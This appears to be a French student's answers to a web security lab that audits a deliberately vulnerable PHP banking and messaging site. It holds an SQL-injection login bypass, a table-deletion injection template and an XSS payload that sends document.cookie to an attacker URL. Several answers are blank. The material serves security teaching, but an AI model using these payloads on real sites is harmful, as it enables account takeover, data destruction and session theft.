##### 1.a Etudiez les différentes requêtes SQL utilisées dans l’application et donnez celles qui sont vulnérables à l’injection SQL

Les requêtes vulnérables à l'injection SQL sont toutes celles qui prennent des paramètres entrés par l'utilisateur. C'est à dire :
```findUserByLoginPwd``` et ```addMessage```

##### 1.b Donnez une façon d’exploiter chaque faille trouvée

```findUserByLoginPwd``` : On peut se connecter avec uniquement le login (sans le password), il suffit de remplir le champ login sous la forme ```<login_existant>';#```.
La requête sera donc traitée comme tel : ```select NAME, FIRSTNAME, LOGIN, ID_USER, ACCOUNT_NUMBER, USER_PROFIL, ACCOUNT_SOLD from users where LOGIN='$login'```, en ignorant le mot de passe
puisque le reste de la requête est en commentaire

```findUserByLoginPwd``` : En entrant un message ```message'); <requête de délétion de table>#```

##### 2.a Proposez un moyen par lequel réaliser une attaque XSS sur le site

Les envois de messages présentent une faille xss. On peut par exemple entrer le message ```<script>alert("faille");</script>```.  On aura alors une alerte lors de l'affichage des messages.

##### 2.b A quoi pourrait servir une attaque XSS pour un pirate. Donnez des exemples de code d’attaque le cas échéant

```<script>window.location=<url du site pirate>?cookie=document.cookie;</script>```. Le site pirate aura alors accès aux cookies de l'application.

##### 2.c Dans le cas où votre navigateur bloque le XSS, cela signifie-t-il que le site est protégé du XSS ?

Non les failles seront toujours présentes, mais le script ne sera pas exécuté sur votre navigateur.

##### 3 Violations d'accès

- Les références directs sont protégées, peut d'informations sont passées par l'URL.
- L'authentification par login/mot de passe n'est pas sécurisée puisqu'on peut utiliser uniquement le login.

##### 4.a Connectez-vous au site sur un navigateur avec un utilisateur X, puis tentez d’accéder à la session en cours de cet utilisateur X depuis un autre navigateur, sans avoir recours au login et mot de passe

##### 4.b. Décrivez les étapes par lesquelles vous êtes passé pour arriver à ce résultat.

##### 4.c. Observez ce qui se passe si des actions sont réalisées dans les deux navigateurs en parallèle. Qu’en déduisez-vous ?

##### 5.a. Donnez une fonctionnalité du site susceptible d’être la cible d’une attaque CSRF

La fonctionnalité d'envoi de message couplée au transfert d'argent

##### 5.b. Proposez un moyen par lequel réaliser une telle attaque 

Envoyer par message un bouton de transfert d'argent grâce à la faille XSS de la fonctionnalité d'envoi de message.

##### 6 Vulnérabilité d'un composant : Notre site présente-t-il des vulnérabilités particulières au niveau de ses composants (serveur web,SGBD, etc.…) ?

##### 7. Chiffrement des données sensibles : Quelles sont les vulnérabilités de notre site en relation avec le chiffrement des données sensibles ?

Les mots de passes ne sont pas chiffréés. Dans le cas où une personne réussit à accéder à la base de données, il aura accès à tous les mots de passes des utilisateurs qui pourraient être les mêmes mots
de passe qu'ils utilisent sur d'autres sites. Cela pourrait donc entraîner une grande crise.

##### 8. Accès aux répertoires par http : Donnez un exemple de problème que peut causer la possibilité d’accès aux répertoires par http dansle cas de notre exemple sr03p20.

Le fichier de configuration est accessible à l'URL : http://localhost/sr03p20/config/config.ini . Il faudrait donc paramétrer le .htaccess

##### 9.a Inspectez le code de notre site pour repérer les éventuelles instructions de redirection non contrôlées.

Dans ```myController.php```, à la ligne 35 pour la déconnexion, la redirection est paramétrée et pas entrée en dur. Dans le cas où on arrive ) changer la valeur de ```$_REQUEST['loginPage']```, on aurait une redirection non contrôlée

##### 9.b. Donnez une façon d’exploiter l’une de ces redirections non contrôlées.
